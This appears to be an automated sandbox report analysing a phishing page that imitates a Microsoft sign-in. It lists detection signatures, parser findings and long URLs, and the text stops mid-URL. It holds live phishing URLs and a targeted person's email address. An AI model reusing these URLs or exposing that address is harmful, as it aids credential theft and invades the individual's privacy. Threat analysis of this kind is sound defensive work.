Play interactive tour

Edit tour

Analysis Report https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com

Overview

General Information

Sample URL:	https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com
Analysis ID:	323890
Most interesting Screenshot:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish_10

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML title does not match URL

Invalid 'forgot password' link found

Invalid T&C link found

Submit button contains javascript call

URL contains potential PII (phishing indication)

Classification

Startup

System is w10x64

iexplore.exe (PID: 2044 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5140 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2044 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\segring[1].htm	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com

UrlScan: detection malicious, Label: phishing brand: microsoft

Perma Link

Antivirus detection for URL or domain

Show sources

Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	SlashNext: Label: Fake Login Page type: Phishing & Social Engineering
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	SlashNext: Label: Fake Login Page type: Phishing & Social Engineering

Phishing:

Phishing site detected (based on favicon image match)

Show sources

Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail

Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish_10

Show sources

Source: Yara match	File source: 942247.0.links.csv, type: HTML
Source: Yara match	File source: 942247.pages.csv, type: HTML
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\segring[1].htm, type: DROPPED

Phishing site detected (based on image similarity)

Show sources

Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	Matcher: Found strong image similarity, brand: Microsoft			Jump to dropped file
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/Mic_BG.jpg	Matcher: Found strong image similarity, brand: Microsoft			Jump to dropped file

Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: Number of links: 0
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: Number of links: 0
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Number of links: 0
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Number of links: 0
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Number of links: 0
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Number of links: 0

Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: Title: Create account does not match URL
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: Title: Create account does not match URL
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Title: Sign in to your account does not match URL
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Title: Sign in to your account does not match URL
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Title: Sign in to your account does not match URL
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Title: Sign in to your account does not match URL

Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Invalid link: Forgot my password
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Invalid link: Forgot my password
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Invalid link: Forgot my password
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Invalid link: Forgot my password

Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Invalid link: Terms of use
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: Invalid link: Terms of use
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Invalid link: Terms of use
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: Invalid link: Terms of use

Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: On click: OnBack(); return false;
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: On click: OnBack(); return false;
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();

Source: https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com

Sample URL: PII: jon.parr@syngenta.com

Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3